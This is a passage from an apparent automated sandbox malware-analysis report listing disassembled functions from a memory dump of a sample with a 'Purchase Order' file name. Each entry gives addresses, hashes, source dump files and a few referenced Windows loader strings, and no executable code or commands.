                                            • Opcode Fuzzy Hash: 8d674899108f1cad0d4101723b1c50e68a56c183cbd45222de42c3d9260aa338
                                            • Instruction Fuzzy Hash: A1110CB6B01304FFF7258A8C9D41F9B76ED9B94B54F1482AD7904EB390D674CD4087A0
                                            Function 34821131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 18ce923405e58d17e32c1a99a65e227c3cc211f469aeb973c4a67a219e3500cb
                                            • Instruction ID: df5bca17d2b1820225a53a054612c90c10d211a9cfde4ee0f700b22f96e570a6
                                            • Opcode Fuzzy Hash: 18ce923405e58d17e32c1a99a65e227c3cc211f469aeb973c4a67a219e3500cb
                                            • Instruction Fuzzy Hash: E8B112B56093408FD354CF29C490A1ABBE1BF88704F544A6EF9A9D7352D770E985CB82
                                            Function 34827370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 073a791ba44d1ed514644066665c105dc6634e90e1e80720361b176f7e608622
                                            • Instruction ID: d7d5a9506104eb91d9594182e5685b123bf88ce35ba831d7ef0bfa1ff964991d
                                            • Opcode Fuzzy Hash: 073a791ba44d1ed514644066665c105dc6634e90e1e80720361b176f7e608622
                                            • Instruction Fuzzy Hash: 42A17BB5608746CFE310CF29D480A1ABBF6FF88744F104A6EE59597350EB70E985CB92
                                            Function 3485F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cac1f659e43ff0b74e2801997db95c5f29dff92a467dc7444174437a8a99333e
                                            • Instruction ID: 4388f96427a59645b18a5636b5844c15c2352cd12f1644990c5eb9e6aab059b8
                                            • Opcode Fuzzy Hash: cac1f659e43ff0b74e2801997db95c5f29dff92a467dc7444174437a8a99333e
                                            • Instruction Fuzzy Hash: BF412BB4D01288DFEB10CFA9C880AAEBBF4FB4C344F5046AED599A7221D7359945CF64
                                            Function 348257C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: ab28008061354b25b4c05e54c6f7a5e97f1d59fcf74c51cf7ef7bb6f313746b2
                                            • Instruction ID: 55ed8c843ad0f2f0cd9ffe9c68737d4256be0a90a3f3c7051d7bbc1e5db7b617
                                            • Opcode Fuzzy Hash: ab28008061354b25b4c05e54c6f7a5e97f1d59fcf74c51cf7ef7bb6f313746b2
                                            • Instruction Fuzzy Hash: 1C317C39716A09FFE7859B28DE40A9ABBA6FF44340F445225E81087B50DB75E870DB80
                                            Function 34823616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 03e7ba1bc54a8217e5f6fb8bc6f643513bd3f8dffa65404a1e012e3452eeff5c
                                            • Instruction ID: 80edfe942346d1e2d20fccbdc8124a64704598c06028a74d477f946374e2b8d5
                                            • Opcode Fuzzy Hash: 03e7ba1bc54a8217e5f6fb8bc6f643513bd3f8dffa65404a1e012e3452eeff5c
                                            • Instruction Fuzzy Hash: F32123792063549FEB219F29C9A4B5ABBA8FFC0B10F41066DE9400B650CB70EE84CFC1
                                            Function 34831CC7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 19f2d646d53fbe455472780cb051951c547730649a5ba54595dfab45e7334de9
                                            • Instruction ID: cb063681219d7016c683d8f8b44308e92c0bcc949de8d4045c99f4806faa1341
                                            • Opcode Fuzzy Hash: 19f2d646d53fbe455472780cb051951c547730649a5ba54595dfab45e7334de9
                                            • Instruction Fuzzy Hash: 2E215E39702B009FE721CF28C880B46B7E5FF99B14F144A69E596877A0DBB4B841CB90
                                            Function 3483DDB1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 9659a530ffb2fb9ee23d0d3c42a304feb376f857bc9b48aeaaaeeb1ec8b5d0e3
                                            • Instruction ID: fefb99fb89fa530a532b6052b644d576a572da0bcb7085d963dbb3b325a45e69
                                            • Opcode Fuzzy Hash: 9659a530ffb2fb9ee23d0d3c42a304feb376f857bc9b48aeaaaeeb1ec8b5d0e3
                                            • Instruction Fuzzy Hash: 3821E4B5A05288DFEB02CBA8C940B9DBBE4EF05748F040299E510AB291C7B99D01C7A4
                                            Function 348192FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: a778926148ea14843e9bb96e1752ba43df324abb2ec117c7074fee62cfb9f574
                                            • Instruction ID: 06121303d2e7e501db8418f8e85f06693ea2bc69cec0ba68c21665d19b841f9e
                                            • Opcode Fuzzy Hash: a778926148ea14843e9bb96e1752ba43df324abb2ec117c7074fee62cfb9f574
                                            • Instruction Fuzzy Hash: 48F09036104644AFE7319B59CD08F9ABBEDEF84B50F18061DE546931A0D6A1A906CA50
                                            Function 348CDEB0 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                            Download Yara Rule
                                            Strings
                                            • System Volume Information, xrefs: 348CDEBE
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: System Volume Information
                                            • API String ID: 0-764423717
                                            • Opcode ID: f7174c413a4fc16b687e1e92ea85116522fc0066012537a1a72e8a0fcccb2cdc
                                            • Instruction ID: 24a26195daf2e20257d211d23659e1003358c7f46413142dd908fb9f883c82c2
                                            • Opcode Fuzzy Hash: f7174c413a4fc16b687e1e92ea85116522fc0066012537a1a72e8a0fcccb2cdc
                                            • Instruction Fuzzy Hash: 2D615A75108305AFE321DF54C880E6BB7E9FF98B94F000A2DF985972A0D6B8DD54CB92
                                            Function 348A3CDB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CWDIllegalInDLLSearch
                                            • API String ID: 0-473384322
                                            • Opcode ID: e9a62cd1bb53f668d3559d7c63d1de88824b9a4fcfe84aba59b08a41ff1a6fea
                                            • Instruction ID: 082ad703fe970a48eb062705299e40ec0e6725fbc797f79f5b040aaf257f6699
                                            • Opcode Fuzzy Hash: e9a62cd1bb53f668d3559d7c63d1de88824b9a4fcfe84aba59b08a41ff1a6fea
                                            • Instruction Fuzzy Hash: 1C51AFBAE04705AFE311CE14C881B1AB7A8EB44760F400B2DFD61D7650D7B4DD69CB96
                                            Function 348AF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: ad200ca859f885c0e1a3e25109151c89108cf32f6a54a55232162c83674939fc
                                            • Instruction ID: aee562636ea7ebd3f371d75dac7add6ca66657e2b526def0a8e62d1b182df1c2
                                            • Opcode Fuzzy Hash: ad200ca859f885c0e1a3e25109151c89108cf32f6a54a55232162c83674939fc
                                            • Instruction Fuzzy Hash: 1A517CB6605305AFE712DF58C840F5AB7E8FF84B98F440A2DBA9097290D7B4DD04CB92
                                            Function 34853EEB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: a7e9046eb181bf8185c5e06dec892ce427d290ebd4320ec65c072efeb7acd2ea
                                            • Instruction ID: 06bb2d368e3e399a4e1aef3e012ed47c689a02abece726ade6708e98fd519b55
                                            • Opcode Fuzzy Hash: a7e9046eb181bf8185c5e06dec892ce427d290ebd4320ec65c072efeb7acd2ea
                                            • Instruction Fuzzy Hash: 6E517B716057109FD321DF19C840A6BB7F8FF88B54F008A2EF9A5876A0E7B4D914CB91
                                            Function 348DB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PreferredUILanguages
                                            • API String ID: 0-1884656846
                                            • Opcode ID: 1d6e36b2acb5e7b74706e1e67c212e12ef64ed8223bbb18ed158caf3c22a2cf6
                                            • Instruction ID: 28cdaf23fa52c685e11239e2792373043b5d8269c16b6fc578b2cf25f1e06846
                                            • Opcode Fuzzy Hash: 1d6e36b2acb5e7b74706e1e67c212e12ef64ed8223bbb18ed158caf3c22a2cf6
                                            • Instruction Fuzzy Hash: F1419176D02219EFDF199A9CC840BEEB7F9AF45750F01036AE911AB250DA74DE40D7A0
                                            Function 348A97A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: verifier.dll
                                            • API String ID: 0-3265496382
                                            • Opcode ID: d429a3d68c7881696527d8bea1cc7288aa7da5d5a7e157f69bee7c01de578622
                                            • Instruction ID: 31a9faac9f878a8295271d133a72ef7451dba923ea643473e710f2c4b82baa35
                                            • Opcode Fuzzy Hash: d429a3d68c7881696527d8bea1cc7288aa7da5d5a7e157f69bee7c01de578622
                                            • Instruction Fuzzy Hash: 4D31C5B97043019FE7158F289850B2677E5EB48750F91893EE508DF380E6B5CC82DF91
                                            Function 3485BC3B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeProcess
                                            • API String ID: 0-2689506271
                                            • Opcode ID: de3d6631cb171a5982f277d4d2fc291c8201cd236726dce2308c6738d729066f
                                            • Instruction ID: 62f83543189c92b0012089c980ca870491164fc98c38806876f008c07a5efd55
                                            • Opcode Fuzzy Hash: de3d6631cb171a5982f277d4d2fc291c8201cd236726dce2308c6738d729066f
                                            • Instruction Fuzzy Hash: 0D416272509309EFF311CE58C944AABB7ECEB88754F004A2EF561D6240D7B4E945CB56
                                            Function 34857505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction ID: 84b11835f4d18028d08266308b349e8db03ffe53ac8c0490e7ef086202dbc776
                                            • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                            • Instruction Fuzzy Hash: 0741C379A0061AEFEB11CF48C490BBEB7B5FF44741F00869AE94697250DB34D941CBE1
                                            Function 348536EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Flst
                                            • API String ID: 0-2374792617
                                            • Opcode ID: 2613daecd5ed3374b4919cff11a7e4c5a0a6385c7a58edbe1cbf8fb2ee1fadc4
                                            • Instruction ID: f06e74c81b6e7ba057edda7ffba2b0f01b3ad611e023e1e88c22945ba89573d2
                                            • Opcode Fuzzy Hash: 2613daecd5ed3374b4919cff11a7e4c5a0a6385c7a58edbe1cbf8fb2ee1fadc4
                                            • Instruction Fuzzy Hash: D34198B5A05301DFE305CF28C480A56FBE4EF89750F5086AEE459CF291EB71D946CBA1
                                            Function 3485329E Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 1ef46b8990956fb9c08d83e89a2b2c3e4374a6f714c16edee16dced8acb9d920
                                            • Instruction ID: 3c6f063e7a81394ffe7172f36dd1e161152a01ba0fe3ceffd971698edaf64362
                                            • Opcode Fuzzy Hash: 1ef46b8990956fb9c08d83e89a2b2c3e4374a6f714c16edee16dced8acb9d920
                                            • Instruction Fuzzy Hash: DA31B3B6609704DFE311CF2CD480A9BBBE8FB84694F400B6EF99483220DA34DD05CB92
                                            Function 34825096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Actx
                                            • API String ID: 0-89312691
                                            • Opcode ID: ac6eed182cfb91848d1c9650f7bc5a5398207df2c576545a50cdb88127a4c66a
                                            • Instruction ID: 031389554820c7460a270b815537f3c57f90f8063c9fe27e9c29b3ce33246044
                                            • Opcode Fuzzy Hash: ac6eed182cfb91848d1c9650f7bc5a5398207df2c576545a50cdb88127a4c66a
                                            • Instruction Fuzzy Hash: FB11907438B7068FF7946D198C5061673D9EB86368F70872EE851DB391EA72DCC18380
                                            Function 348A106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrCreateEnclave
                                            • API String ID: 0-3262589265
                                            • Opcode ID: 30c5becbbdbcc7a07bc1f669de21ed677732bd26c6937ccf066e31787618e4b0
                                            • Instruction ID: cdb8bc897b507f40af11be26919af7c3823316ac05f53b4d7bf653689a8a296f
                                            • Opcode Fuzzy Hash: 30c5becbbdbcc7a07bc1f669de21ed677732bd26c6937ccf066e31787618e4b0
                                            • Instruction Fuzzy Hash: B021F0B59183449FD320DF2A8844A5BFBE8EBD5B50F404A1EF9A096250D7B0D809CF96
                                            Function 348E16CC Relevance: .6, Instructions: 571COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62ab3b0932540526f37e4b6fb13ec075b13ba74beb0ebd9c9ebd7ecc181a238d
                                            • Instruction ID: 3f5d491813afb7c8c01f4463735e8c88bcf63a197286f2e0305803d78b1de8be
                                            • Opcode Fuzzy Hash: 62ab3b0932540526f37e4b6fb13ec075b13ba74beb0ebd9c9ebd7ecc181a238d
                                            • Instruction Fuzzy Hash: 1722AF79B00216CFDB09CF59C490ABAF7B2BF8A314B54466DD951DB344DB30E982CB90
                                            Function 348E1D5A Relevance: .6, Instructions: 559COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_347f0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 06999588b088d80043f29c43c2c5ec8ad1fef321a9e079decae1bd51478dac19
                                            • Instruction ID: c5c192352e5d603e9e3b045284347afbf11731779a2f6effd96b3aca81027af9
                                            • Opcode Fuzzy Hash: 06999588b088d80043f29c43c2c5ec8ad1fef321a9e079decae1bd51478dac19
                                            • Instruction Fuzzy Hash: 79225D756047128FD709CF18C490A2AF3E1FF8A354B548A6DE996CB395DB30E886CB91
                                            Function 3482D7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2689763841.00000000347F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 347F0000, based on PE: true
                                            • Associated: 0000000B.00000002.2689763841.0000000034919000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003491D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2689763841.000000003498E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
